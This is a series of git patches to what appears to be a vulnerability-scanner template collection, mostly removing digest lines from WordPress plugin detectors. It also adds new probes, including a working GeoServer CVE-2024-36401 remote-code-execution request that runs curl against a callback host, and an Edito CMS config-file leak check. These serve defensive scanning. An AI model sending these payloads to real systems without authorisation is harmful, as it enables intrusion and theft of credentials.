b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index a230987e00..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022013fa41501ef935ce1178014aae3c26456f62a13d145c4219f7af3f46fc21ab19022032822fba308f3d2d7577c598c5c21e0296a01fa07e119af0c76b44eb1716085e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 79018b3941..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210081982376801c69a367b3b15dc2501a254895777a955bf5ae368045973ae2c54a022100a6f239fc9482dfc6304a037d0cf6b2337bb9796e9c672abd57f4d0348d7b77ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index b2dc699440..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f8ae007efe5721c4e3f9041c0213527224342341bd64b3e088d1a9ca3b24ea7f022100c6faaff7db088067079f9950ef5c7b13dbee3e5b51a8b6b5456a925995a459c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 9583141ee9..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022076eed2484961d49e2d7f4d7f5d10b1dd5993557f50269b41da1dcdb25fee7b780220432217f72d77eb0d89567dbb499bff5c5df9c3cb7dfde7c4d36bd720f86e8a25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index dc1b3fb6c2..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202ce99bb13ba10910b6f7a99f917748408a91df87f4008af6d1a6dbc71c635c6b022100babe79c89f6fcb8d71edd21e6f4268bd11ae7225aa4cf75212524173fbbed614:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index f7520e6e45..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220373448dbd1b8f3857b4f7a8882c606917f6512c7291eb1942d29f6fe8ab2b002022100d077ddcb0028bc9ce3d9bfe0daccafba5a19b7549ab022fdb280127f3cf4cad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 1e9d6f81ef..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220090101b90ced0a92cb53a10923a8492ea7162097074e30428741852798191006022039e8c6783242dbef266a41ac9829b3ab41b44d2b999d857f098acc7fa8138df0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 40daf41c8a..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022069c6ae21de775708fd508f096dcefb0ed8236e429970b0cf43b156d4f67875cc022075e0147dec3909af8e621c38ef31d1da7d87d45eee0c450b907eb2fe4dd40dab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 7ec77d0e4f..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f86f12a25f2768d32e3036f0890fd240a8c31ee35548277e15eb57befa81a3b9022100958465b84f00fb7f02f027fc214a830964337ce92a58ad08b91079b254e836d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 5747febceb..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fa8dc5227635d0921f1f2c2b432d691be918b734d0f1c121371cab391641514a02206b10ad86fe2ff90b54f530a8cd498757685bdb415a40f4e2243a4ee52dbfb1c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index b072f35fdc..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dcc45468cfd5a574214955c26d84fb6b302764fb67c4906bdb54dc264d3a9023022100c573eda08aca8ba1c0d1f5b78d1765ad8566d239396dab0dc6d6ae32c8a57ee0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index b72386b44e..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c2c48ade63390bab9f9853b2c32a564f2a0ce633d5ce1eac468bfcd8b117e8d5022056e6542b9edc86233c6adcab9ec7f516703fa892500f878221c75b88094ba3d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index fb9047b36d..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204ec9027dde011d1c7d68df184bfe1443ee5587802d5e679b8a504f238639672c0220054981901d15640a4a5c32330f60f89fc56e53b3c2601ae23db154ccb0723633:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 039c9c1731..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d49ace635c840304ef04be9821a9a305470f700a7deb5d0be5f8bf2b9d02e99f02207be714cf766270c0dc57927f0d89aa605131b38012209f9a9786fa287f27cb28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 802369095f..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b26daa0e783e18aeb7e20500459175f0efc56c667e41cc7d21fcd632a4908c5902204fa48a0bc915ea9196114b52a319d55e10ed3c08d7e5acf36176c8f140c9ecfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index eb3326fe73..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e0e85685596e92f2e889050c9d362eb944d5b841935e0484f4ace2da2799421802204f2cf2f89e5d93f72a58ed637abbd82d4f9e33a833718ebc22cdbe4a3661a2a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 26230a85e0..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210090dccaa9ca559a51c5c516de47701606b719216b56d2e73a3d7b38541c1eafd7022100cb2960b687755daf7eb8264d683002aad2e77faa2ae1e4b3dc066b4bbd2f8c1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 476eaeaedc..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009ebd54db67a03ab5598233eadc73407df023ee63d17de32e3185c3479ede7a12022100b3acf8fbd2fe6571f23edce345c5e5272c01129f29138f2d926b453bad141613:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 35081b2f09..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205f17087a67f68bee833999ff4ad4cf5a5cd03c385bd18ca37154be7453a8aac502201b194493c10932d4053e821139443347eb144bedafd74cc2f85e259b8cb1f631:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 433309e350..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a0ff93b70db42aa8877ef30d5650ac8a967090f77a00ce2de778653f6186397b02205a74cab8814649fe2f4d667624fc7ee03a3b74be697f37b68f1f48681aad00dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 8f122c84ce..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008353b60c7830d9c53bcecbd0f147561fd0863ac193bc1fa1f5194fdf97cb1fc302207aaf0c9cab1084c65976028c2ec7f1c4ee4904e0081a42f7b899c48045c4ce8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index e11185daa9..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205f30601773989ca20ba35670148574405a0f6aad2e2663161f4666f6d5227f9b022039403fe0ccebb31c9833ba6d6f8bd90a0a2ce82f539305b9cc9d4351e7fdc2f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index aa9584f15d..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004ed82f694e456832ffa0163a4d4fac8660b211bb32dda8a94ca9d914a79ac2402204f58d1ec5397cb0e7c069180814e2d9820414ae61fae4be4654695a2fb6b1160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 2d94a6d566..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c1f0a2313b5755229bc4ab48b36231be887eddd99f464e2a3a4c6b67efaad1602206b22f0030f19619821b2eb758773f2285410c7831211b546cca40c9d4499c9e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 7186ea947d..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a94aa5c38b23ac125c4788839fb2eb8af33fac15e747a0d2e857c6d8a19c54a6022100b5511751fabeefdf8f2157db62315db44a8e71c9292d34447c6118ec90713930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 89b02023c5..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022027956bc9efa1196c03bfb2bded197064bff9a456c0cfe98f53bf3e7cc1c933970220356f7adc492a260661a1f5eed0c771fe8f2604597da4b9939809872d2e56b33c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 5f99405262..58e5e828bf 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201826b090cd922e29e009382eb32c56570d619bd24c2a9861648cdff47815543e0220679ef8bbc847a20df24323c373b36ba81f29ba5c73178b49d6698efce75bf394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 8725b18ca9..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009d5d9f7875c8affecfdf9393a7e20795b4584198fa6083fdb1551aa817e9fd68022037bea5fb1b2d733d25ead30bd6c28945a18ea77281a98cf90e486064b4299a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 2afae53c86..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022029199a785f6429b8feeaeb10e28eb0a40ead6249bc933ee042d96f7000f222a9022100d5612e70c11166f87a0efc6f192a3fff3ecb5ea999294e41df0a68b45ef40f51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 3166852e10..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dfd4d141883ee2ed3b4d386d5be43b7cf43b09e610ecacf3e236c653a0e46d24022002ab9d1e96445fe86be536c661023792a391df9c8e7a4bbbbf260fabf2bb2b28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 12d4df0e3a9c75f9cecda45e44eab75a608ed266 Mon Sep 17 00:00:00 2001 From: Mohammad Reza Omrani <38619429+omranisecurity@users.noreply.github.com> Date: Wed, 3 Jul 2024 11:29:28 +0330 Subject: [PATCH 0811/1841] Create snoop-servlet-exposure.yaml --- .../configs/snoop-servlet-exposure.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 http/exposures/configs/snoop-servlet-exposure.yaml diff --git a/http/exposures/configs/snoop-servlet-exposure.yaml b/http/exposures/configs/snoop-servlet-exposure.yaml new file mode 100644 index 0000000000..350cf27790 --- /dev/null +++ b/http/exposures/configs/snoop-servlet-exposure.yaml @@ -0,0 +1,23 @@ +id: snoop-servlet + +info: + name: Snoop Servlet information disclosure + author: omranisecurity + severity: medium + description: The Snoop Servlet returns information about the HTTP request itself and sometimes. It could help an attacker to prepare more advanced attacks. + reference: https://www.acunetix.com/vulnerabilities/web/snoop-servlet-information-disclosure/ + metadata: + shodan-query: http.title:"Snoop Servlet" + fofa-query: title=="Snoop Servlet" + tags: config,exposure,snoop,snoop-servlet + +http: + - method: GET + path: + - "{{BaseURL}}/snoop" + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Snoop Servlet - Request/Client Information")' + condition: and From 806d45b62c094422de844b971fb1385839a34bfe Mon Sep 17 00:00:00 2001 From: Mohammad Reza Omrani <38619429+omranisecurity@users.noreply.github.com> Date: Wed, 3 Jul 2024 11:33:31 +0330 Subject: [PATCH 0812/1841] Update snoop-servlet-exposure.yaml Severity change --- http/exposures/configs/snoop-servlet-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/configs/snoop-servlet-exposure.yaml b/http/exposures/configs/snoop-servlet-exposure.yaml index 350cf27790..5ff4d3f827 100644 --- a/http/exposures/configs/snoop-servlet-exposure.yaml +++ b/http/exposures/configs/snoop-servlet-exposure.yaml @@ -3,7 +3,7 @@ id: snoop-servlet info: name: Snoop Servlet information disclosure author: omranisecurity - severity: medium + severity: low description: The Snoop Servlet returns information about the HTTP request itself and sometimes. It could help an attacker to prepare more advanced attacks. reference: https://www.acunetix.com/vulnerabilities/web/snoop-servlet-information-disclosure/ metadata: From c3dfb8a8a438845a364dae876b1e50577f059cd3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 3 Jul 2024 14:16:01 +0530 Subject: [PATCH 0813/1841] Create CVE-2024-36401.yaml --- http/cves/2024/CVE-2024-36401.yaml | 42 ++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2024/CVE-2024-36401.yaml diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml new file mode 100644 index 0000000000..d096c52019 --- /dev/null +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-36401 + +info: + name: GeoServer Unauthenticated Remote Code Execution in Evaluating Property Name Expressions + author: DhiyaneshDk + severity: critical + description: | + In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. + reference: + - https://x.com/sirifu4k1/status/1808270303275241607 + - https://nvd.nist.gov/vuln/detail/CVE-2024-36401 + metadata: + verified: true + max-request: 1 + vendor: osgeo + product: geoserver + shodan-query: http.title:"geoserver" + fofa-query: + - app="geoserver" + - title="geoserver" + google-query: intitle:"geoserver" + tags: cve,cve2024,geoserver,rce,unauth + +http: + - raw: + - | + @timeout 20s + GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: content_type + words: + - "application/xml" From 5198562b2da00c6e9366d0370df0360a2694e582 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 3 Jul 2024 13:13:37 +0300 Subject: [PATCH 0814/1841] CVE-2024-4836 add --- http/cves/2024/CVE-2024-4836.yaml | 32 +++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/cves/2024/CVE-2024-4836.yaml diff --git a/http/cves/2024/CVE-2024-4836.yaml b/http/cves/2024/CVE-2024-4836.yaml new file mode 100644 index 0000000000..5524a10bd3 --- /dev/null +++ b/http/cves/2024/CVE-2024-4836.yaml @@ -0,0 +1,32 @@ +id: CVE-2024-4836 + +info: + name: Edito CMS - Sensitive Data Leak + author: securityforeveryone + severity: high + description: | + Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user. + reference: + - https://cert.pl/en/posts/2024/07/CVE-2024-4836/ + - https://github.com/sleep46/CVE-2024-4836_Check + - https://nvd.nist.gov/vuln/detail/CVE-2024-4836 + metadata: + verified: "true" + max-request: 1 + fofa-query: "Edito CMS" + tags: cve,cve2024,cms,edito,info-leak + +http: + - method: GET + path: + - "{{BaseURL}}/config.php" + - "{{BaseURL}}/config/config.php" + - "{{BaseURL}}/include/config.php" + - "{{BaseURL}}/includes/config.php" + + matchers: + - type: dsl + dsl: + - 'contains(body,"db_password")' + - 'status_code==200' + condition: and From dfe3cde4f1f54814546042db0238149654baf657 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 3 Jul 2024 13:21:04 +0300 Subject: [PATCH 0815/1841] fix --- http/cves/2024/CVE-2024-4836.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4836.yaml b/http/cves/2024/CVE-2024-4836.yaml index 5524a10bd3..da30b2e2b2 100644 --- a/http/cves/2024/CVE-2024-4836.yaml +++ b/http/cves/2024/CVE-2024-4836.yaml @@ -5,7 +5,7 @@ info: author: securityforeveryone severity: high description: | - Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user. + Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user. reference: - https://cert.pl/en/posts/2024/07/CVE-2024-4836/ - https://github.com/sleep46/CVE-2024-4836_Check From 51158b2dd20417c4223b257dc0799053dc6b98d9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 3 Jul 2024 10:29:42 +0000 Subject: [PATCH 0817/1841] Auto Generated Templates Checksum [Wed Jul 3 10:29:42 UTC 2024] :robot: --- templates-checksum.txt | 428 ++++++++++++++++++++--------------------- 1 file changed, 214 insertions(+), 214 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5fae894c51..a5e23aac6f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -731,7 +731,7 @@ helpers/wordlists/wp-passwords.txt:dd36d46539d71aa9d1ecbdc83c7b74b931986d56 helpers/wordlists/wp-users.txt:b07f7f79b1d6ed1832e37e1d3feea3fd2bfb764b helpers/wordpress/plugins/ad-inserter.txt:f877a4a8ab02364267e9ac08e5a43ed3eb6f221e helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/admin-menu-editor.txt:f84939ff21a1ffe63d6f3e405737228a6e174657 +helpers/wordpress/plugins/admin-menu-editor.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 helpers/wordpress/plugins/adminimize.txt:ec155403800c88db49630516a63f68500f17d612 helpers/wordpress/plugins/advanced-custom-fields.txt:a7fbd6d327737c06c4df75324d67f7a31797d931 helpers/wordpress/plugins/akismet.txt:fb52ada446f84acb5529ace8fe4f25e203a5dddb @@ -741,7 +741,7 @@ helpers/wordpress/plugins/all-in-one-wp-migration.txt:41d75a1151922be816d326fae3 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:e935235d3647d6ff94e208a06b4173d6d3f01134 helpers/wordpress/plugins/amp.txt:c955a071223dbc4ae3893b0d1dc4db00dd77d91f helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6fa2 -helpers/wordpress/plugins/astra-sites.txt:9bab51b354b67876c6284de28df0e549940fb873 +helpers/wordpress/plugins/astra-sites.txt:fdeeef76ef3c6bd7a322612266668f43721e50f7 helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711 helpers/wordpress/plugins/autoptimize.txt:1889abba77b26fc1827431e5d46978a5e89769e6 helpers/wordpress/plugins/backwpup.txt:36442478f1f952d62cb89e1b634d5937a7d2863f @@ -749,7 +749,7 @@ helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930cc helpers/wordpress/plugins/better-wp-security.txt:3fe0b3c91b9dd2a6f57c0d1e7ec7c05ac3858661 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/breadcrumb-navxt.txt:2993934f31a10ddda5a7fb5e979600aa8bc7d69d -helpers/wordpress/plugins/breeze.txt:12c708130d75c9e7150d0af82c0b82b66c6c85e0 +helpers/wordpress/plugins/breeze.txt:4e23fad538d40483dcecac95bf2c3e9e86f43a8c helpers/wordpress/plugins/broken-link-checker.txt:47ac56ccfa5b6db61c32cb48c2dda8cc64d242cb helpers/wordpress/plugins/chaty.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 helpers/wordpress/plugins/child-theme-configurator.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 @@ -787,7 +787,7 @@ helpers/wordpress/plugins/elementor.txt:9e43adc2b2562071078f6f82962886b245d01a6a helpers/wordpress/plugins/elementskit-lite.txt:b981b5efd3a591e7a7cda1a4740574ce3b34b19a helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 -helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:c2f6e33fb60b67b268545d3b0e259764776a283d +helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:4a75639c283b56053860c27e1607b76f949fbb7a helpers/wordpress/plugins/ewww-image-optimizer.txt:870e5d450f9b724470527fe121b78fd6bbf6d9aa helpers/wordpress/plugins/facebook-for-woocommerce.txt:bfab3aeb3ee470933c959fbaefb61840492ea8f8 